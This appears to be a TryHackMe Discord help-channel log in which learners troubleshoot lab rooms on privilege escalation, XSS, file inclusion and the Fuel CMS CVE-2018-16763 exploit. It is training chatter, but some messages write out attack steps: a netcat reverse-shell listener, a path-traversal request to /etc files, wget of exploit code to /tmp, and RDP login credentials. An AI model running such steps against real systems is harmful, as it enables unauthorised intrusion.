I just want to see if it's an issue with the target machine or an issue on your side

Ok

i think the ip have changed

Did you shut down the machine or is 10.10.169.58 still valid?

ya

one second

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.24.117

that's the new machine

it's not working thow!

when i'm pinging it i get no response

Could you enter ip a s in a new terminal and let me know if you see a tun0 interface?
As well as letting me know if you only see a tun0 interface or any extra like tun1, tun2 etc.

yes i do i have a tunel

i see it

tun0

and it says that im connected on thmm

So no tun1, tun2 etc. ?

no

Alright, if you do curl 10.10.10.10/whoami does it reply with your tun0 IP ?

ya

it dose

10.10.24.117

this the new machine ip

Is your attacking machine a virtual machine?
Or is it an installed one ?

virtuall

virtual

Do you have any personal VPN or similar running on your host machine (the one that is hosting your virtual machine)?

Or another instance of the thm vpn running on your host machine?

yes

on my host machine

Okay, well then that's most likely the cause for your issue.
So turn that off and try ffuf on your attacking machine again

i did same problem

So is it off right now or on?

it's on

Please turn it off and leave it off for now, then run ffuf again

I'm getting really tired i well look it tomorrow thanks for everything

Thanks for offering; I think I'm just new to the interface and hadn't started the attack machine, or it has expired. When I get time back I'll give it another go, probably just my mistake though.

Gave +1 Rep to @steel nymph

OK, so it really does seem like static-labs.tryhackme.cloud is inaccessible to me, cannot telnet on port 80 or 443 and the link in the exercise appears to go on forever when I try to navigate to it, almost like something is capturing the traffic? I'm going to skip this question and finish the rest of the lessons first. If I missed something obvious, please point it out to me, otherwise I'll write something in the support channel.

is anyone facing issue with browsing any website on the attack box , like the network doesn't have internet connection or timeout ?

Are you a subscriber ?

yup

I just tried it and it seems to work just fine with internet on the attackbox

So maybe just restart it, if you are sure you are sub 🙂

As only subs have internet access on the attackbox

thanks for replying i re start my web kali machine and try again.

Gave +1 Rep to @shadow echo

Oh, you are using the kali machine, not the attackbox?
I recommend using the attackbox, since the kali machine is outdated and not getting maintained/updated anymore

okay i will , thanks

Gave +1 Rep to @shadow echo

This is not how you make a newroot user? This is the Linux privilege escalation room task 5

Remove that random empty line

Still get the same issue

You changed the second instance of the word "root" to newroot too

And you're not showing the issue

okay I went back to only changing the first instance

when I 'su newroot' and it prompts me for the password , it still takes me to root

Yeah. That's the idea.

It's a privesc.

so its not going to show 'newroot@debian'?

No, it's going to sign you in as root

Which is the point

ok

in the windows privilege escalation room I have to put a malicious DLL file in the Temp folder

but Temp is restricted to admin

oh ok there's another Temp folder in C:\ instead of C:\Windows

Hi, does anyone have any notes for the Jr pentest path module that they can share please

Starting to write down your own notes will help you much more

in windows privesc, when I use the command sc start dllsvc it just creates a file named start with dllsvc written in it

weird

if I type sc start whatever it writes whatever in the start file

are you running the sc command in powershell or in cmd???

in powershell

if you are running it in powershell edit the command to be sc.exe start dllsvc

as sc is a cmdlet built into powershell that has the same name as the services executable

it works thanks

why does it say to use sc

was it working before?

because that is what the executable is called

and works flawlessly in cmd

oh ok I was supposed to do it in cmd

thanks @sage current

Gave +1 Rep to @sage current

no problem

Pretty sure there's a big note in the room about this

Nearly, it's an alias for set-content

oooh thanks for that info james

knew it was some thing interfering with it in powershell

I can't find it

the note comes in the next task

@merry night There's a note in the task because it's a big area of confusion, but I suspect it's one task too late

Hi learners !
I have no result on the Task 8 "Practical Example (Blind XSS)" even if after creating my own web server (nc or python3 -m http.server).
I changed the payload with my own IP and tcp port set but no result during the request to ticket on my web server... an idea ?

it is broken unless you do it on the attackbox instead of your own attack vm

Alright, thanks for your quick answer. I gonna try on the attack box 😉

Gave +1 Rep to @sage current

no problem

Probably just being stupid here but, im doing the authentication bypass in junior pentest and under bruteforce is says to be in same directory as valid_usernames.txt but i cant find that file can anyone help?😂

Just read that 🤦‍♂️

anyone know why the crack hashes button on crackstation.net is greyed out for me?

Anyone did CVE-2018-16763 for Fuel CMS exploit recently ? I tried few different scripts none of them worked, tried also with installed one, no luck either.

Only thing I could get is phpinfo to display, any other attempt is not working, It prints text but it doesn't exec command.

Which exploit are you using? If you look at edb there are 3 exploits

I used one already installed on machine, python script that is attempting RCE via /pages/filter URL. Tried couple of other similar scripts none of them worked.

Had issues with this yesterday, but I managed to get it working by using the script installed on the AttackBox

The most I got was phpinfo() page, using link that was provided in github issue on Fuel CMS

I guess will start fresh today and see if I can get it running

Used this one right ?

yep, although I used the shell_me command in order to set up a reverse shell to connect to it

Did you use port 80 ?

no, I think I used port 4444 (but you can use pretty much whatever I think). open another terminal and do e.g. "nc -lvp 4444" and then use your ip + port 4444 in that fuel cms script

ok, will try

Did I do something wrong ?

10.10.20.132 is address of machine I am attacking

oh, lol it's attacking machine right

😿

got it

yeah so when doing the reverse shell you need to enter the ip of your own machine (the machine that runs the nc listener, nc -lvp 4444)

nice!!

Did URL attack work for you ?

I tired so much different scripts but couldn't make it

nothing worked for me except the script that was pre-installed sadly 😅

Yeah but even that script will only work with reverse shell

Yeah I figure it out, never used reverse shell before

But I am still thinking if this script is able to open reverse shell with same url, output of php system function is somehow omitted or silenced

Well there is not a lot of info, I gone thru source code and saw that it allows you to input your own callback function, exploit is trying to execute php system function in order to execute shell commands.

that is my guess, but it shouldn't be like that, if you use shell_execute it should be displayed internally maybe

system should return string of actual result

yeah but I wanted to simply exploit it thru the URL, it seems like something was changed, maybe php version no clue.
Since this video is showing that he is able to execute commands and get output at the top of page with similar script :
https://youtu.be/ICjRD0Mwhys?t=687

I already shared timestamp

he used this script

https://www.exploit-db.com/exploits/47138

yeah, I did have to fix some things, because python on machine didn't recognize urllib.quote it was moved somewhere else.

and deleted burp proxy same as he did

I have no idea, I even printed the whole page at one point, but the response was so long that terminal wasn't showing top of it

Yeah, the only success that I was able to run directly with URL was phpinfo as shown in original github issue.
https://github.com/daylightstudio/FUEL-CMS/issues/478

the other scripts just improve on this concept and use print + system to execute shell commands

Probably missed something in my thinking

Yeah maybe I will, wasted so much time on this huh

So for this linux escalation room , task cron jobs file permissions , would I run my netcat listener in my attacking machine ?

It's a reverse shell

Do you understand how reverse shells work?

Yes

Then you should know where to run the listener

If you don't know, you need to go back and study reverse shells again

The IP that you are using as listener is wrong. :)

may i have a suggestion here for the detailing text of the Cross-site Scripting room?

the task in the end may not be that clear for new people

i found a lot of whining on Reddit about nc does not work, but actually it does

i know i solved it, i will write my suggestion in the mentioned channel, thanks @steel nymph 🙂

Gave +1 Rep to @steel nymph

oh, it's not a room, then i will do it after my meetings 🙂

Is Metasploit: Exploitation reverse shell task possible with THM attack box ? Like it's suspending machine if you switch from one to another.

Try using the attackbox in full screen, so you don't have to use the tabs in the split view

Thanks

Gave +1 Rep to @shadow echo

I am not able to use linux/gather/hasdump module as suggested, I am not finding anything online.
Should I run console with sudo, tho this is THM attackbox machine I am already logged in as root

You need to be root on the target session

The module reads /etc/shadow on the target, which needs root privileges

oh

yeah I wanted to read that file but it didn't allow me from reverse shell

well I guess will run script with sudo

What's the script in this case? The payload?

yeah, it's elf file

That's not a script, there's a difference between a script and a binary and that's super important. Compiled vs interpreted. Machine code vs text.

Yeah I know the difference just not super good with terminology

@idle bison
Thanks anyway I was able to complete room

Gave +1 Rep to @idle bison

sh-4.1 is the root shell on this machine right? (Task 11 SUID/GUID Executables Known exploits of a Linux Privilege escalation room)

A # in the prompt usually means root, yes. You can also run whoami or id to validate

oh yes of course

Hey

I am not able to any thing when I put http://MACHINE_IP/

not able to continue with burp exercise

please help me here

You have to press the green "start machine" button and wait for it to show the ip

I am inside the machine

machine is up but when I am using machine ip on browser its not showing me anything

I can see service is running on port 80 ideallly http://machine_ip/ should give some response

but I am getting the site can't be reached

🙂 ip bro ip LOL

You would be surprised how many people are really using "machine_ip" in that URL instead if the real IP 😉

But regardless, if it's showing you the URL with machine_ip you most likely haven't started the target machine yet and substituted the "machine_ip" with the attackbox IP, which would be wrong

But best to verify and show a screenshot

!docs verify

When doing UNION injections, what is the points of having to select multiple columns such as UNION SLECT 1,2,3?

does it have to do with output? that is my only gues really

Hi, I'm doing Linux PrivEsc and when I do wget on the target machine it says Permission Denied. Can anyone help me.

do you have write permission in the folder you are running wget in???

yes

can you verify your discord and send a screenshot???

!docs verify

Done

a screenshot of wget in here.... in the folder you are running it.... together with a ls -lah in said folder

alright

you are trying to put the exploit.c file in the / folder????

obviously you do not have write permission in that folderf

put it in /tmp

OK

Thank You Friend. But I also tried to put in home folder.

the left part of your image above is not where you are putting the file on the target machine

and a lot of the time you don't have write perms for any folder except /tmp on your target machine

@sage current You are great

thanks....

yo just one question... how does that green not hurt your eyes 💀 lol

I'm used to it. xD

why isnt working??
┌──(root㉿kali)-[/home/kali/Downloads]
└─# python -m SimpleHTTPServer 8000
/usr/bin/python: No module named SimpleHTTPServer

because you are calling the wrong thing

i already tryed python2 and 3 and still doesn work

Yeah. Because that's not the right module

Because that's not the right module???

SimpleHTTPServer worked before

Correct. python3 webserver module

that should be your search term

It might work with py2, but I don't think it's part of the 'default' py2 deployment on kali. Which means you'll need some other way of acquiring the py2 module, as the pip2 mechanisms are now deprecated

┌──(root㉿kali)-[/home/kali/Downloads]
└─# python3 -m http.server 8000
Traceback (most recent call last):
File "/usr/lib/python3.10/runpy.py", line 196, in _run_module_as_main
return _run_code(code, main_globals, None,
File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.10/http/server.py", line 1290, in <module>
test(
File "/usr/lib/python3.10/http/server.py", line 1241, in test
with ServerClass(addr, HandlerClass) as httpd:
File "/usr/lib/python3.10/socketserver.py", line 452, in init
self.server_bind()
File "/usr/lib/python3.10/http/server.py", line 1284, in server_bind
return super().server_bind()
File "/usr/lib/python3.10/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.10/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use

still not working

Says Address already in use, have you tried a different port number?

was that!!!

thanks person!!!

do you know why cant use port 8000??

Something else is using it

strange... hahahha... good answer! thanks

sudo ss -ntlp will print out the listening ports currently in use

but why the file is denied

HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
37292.c: Permission denied

Cannot write to ‘37292.c’ (Permission denied).

Are you sure the directory you're in is writable with your current permissions?

the file has chmod 777 and im making the server from root

from the route where the file is

do you think that error is local, or remote?

it may be local i think

I mean the machine you're downloading too, not the attacker perms.

well a tried from the root and from the /home/matt and doesnt work

try downloading to /tmp

ill try...

nop....

still the same

work!!!!

thanks

What did you do different to get it working?

/dev/shm

that's usually a world-writable ramdisk; some system configs disable that

ive realized that privesc is totally a new information and very complicated... until now anything was so paynfull...

hi i'm stuck on a task on file inclusion challange 1 where i have to change the request to post. i did that in burpsuite and wrote to the file: ../../../../etc/flag1 but doesnt work
looks like that
POST /challenges/chall1.php?file=../../../../etc/flag1

No reason to ask twice in two different learning path channels, that's just confusing

i deleted in the other channel cuz it was the wrong channel for that

oops didnt delete fully

i done this can help if you want

flag1 is txt file you need to specify extension, not sure if anything else is wrong but you would definitely need to .txt add the end of file name.

you need to use burp suite

in window privesc how can i connect from my machine using RDP?? i dont remember saw this way of connection...

cause the split view from thm isnt working

you can use remmina or xfreerdp, you'll have to lookup the usage/syntax for them :)

may i connect from my kali machine via terminal using remina or xfreerdp?

yes, and remmina has a gui but xfreerdp is run from terminal but they both provide a gui connection

ok, ill lookup then what these remmina and xfreerdp. Thanks person!!

Gave +1 Rep to @maiden stratus

got with xfreerdp!!!

/usr/bin/xfreerdp /u:user /p:Password1 /v:<ip_win_machine>

windows-exploit-suggester.py –update

isnt working

When saying something doesn't work, it helps to show a screenshot of your command + the error

windows-exploit-suggester.py –update: command not found

Did you put ./ in front of the file name when running it?

yes

Using the right python version?

yes

In the same directory as the executable?

Looking at the code now, are you using -update or --update? Becuase you should be using the latter.

Hello, I am trying to figure out Cross-site Scripting room Task 8.
I am running it on the AttackBox. I am using 10.10.x.x:port for ip in the script. I have tried both nc and python3 http.server. I have checked for syntax mistakes...

Anyone got any Ideas?

/port is incorrect

It's :port

I have it : in the syntax.

using 8899 on payload and 8890 on listener

oh nvm

can you try listening on 443, it might be wanting a "real" port or others might be blocked by firewall

tho don't think that was needed iirc

ports seem to be working. both nc and http.server

try open port 443? can do.

yeh, but it's likely not the issue just a guess

Ive seen walkthroughs do it with 9001 with nc and 8000 with httpserver..... 443 didnt work either

Yeh, xss rooms can be buggy or there might be something else, not sure honestly 🤷

If none of the SUID in my vulnerable remote machine is listed in the GTFOBins github page under the SUID heading, does that mean I cant use any of the SUID binaries listed in my remote machine to carry out a privilege escalation attack?

I noticed that in screenshot I posted , three of my files say 'root staff' whereas all of the other SUID's list the file as 'root root'? Are those three files out of place?

"shell.elf" lmao

You find that to be a funny name?

No, I find it to he a relatively obvious abusable binary

Well I didn't know

I mean, it's called shell, it's in tmp, it's probably not there by default

Yo does anyone know if you can set Macros with ffuf like with burpsuite?

I need help regarding dnsrecon

Whenever i dnsrecon, an error occure "ModuleNotFound" netaddr

Man anyone facing with issues windows privilege escalation Tib3rius room

Even other rooms related to windows privilege escalation

Cuz can't hold the connection for long time

Tried to revert machine no use

I'm using remmina

Xfreerdp aswell

If anyone of u had same issues let me know

Humm no, I just did it I had 0 issue with remmina

and shadow has had zero problems with xfreerdp

guess you might have duplicated tun devices making spooks

or is using a vpn on the host machine and the tryhackme vpn in the attack vm

which could also cause problems

I never use the attack VM, only my Kali VM

shadow would state attackbox... attack vm is a short hand for your own kali, parrot, or black arch vm

for shadow that is

oh yeah I scramble words lol

What is the request look like?

exploit for Exploit Vulnerabilities module, task 5 practical is not working, getting traecback errors from exploit. Any help?

Screen shot please

im on sql injection task 7 and im wondering if theres a way of automate the process of trying out characters until the boolean turns to true. I've tried burp intruder but when it hits the right character it doesnt change in response or status

i know the basics of python but ive never really scripted anything like that

tru

thanks for the tip

not to downplay the importance of scripting but you can use sqlmap too

Sorry I ended up figuring it out a few hours later and didn't update. Thank you for the help though!

Gave +1 Rep to @rustic totem

good morning

I am working on "Walking an Application" and the flag for task 6 does not seem to be working. Does anyone have a solution? I read that there is another flag somewhere but I only see the one.

I found all of them except for the final flag it says it is in the network section and I found a flag there but it does not accept it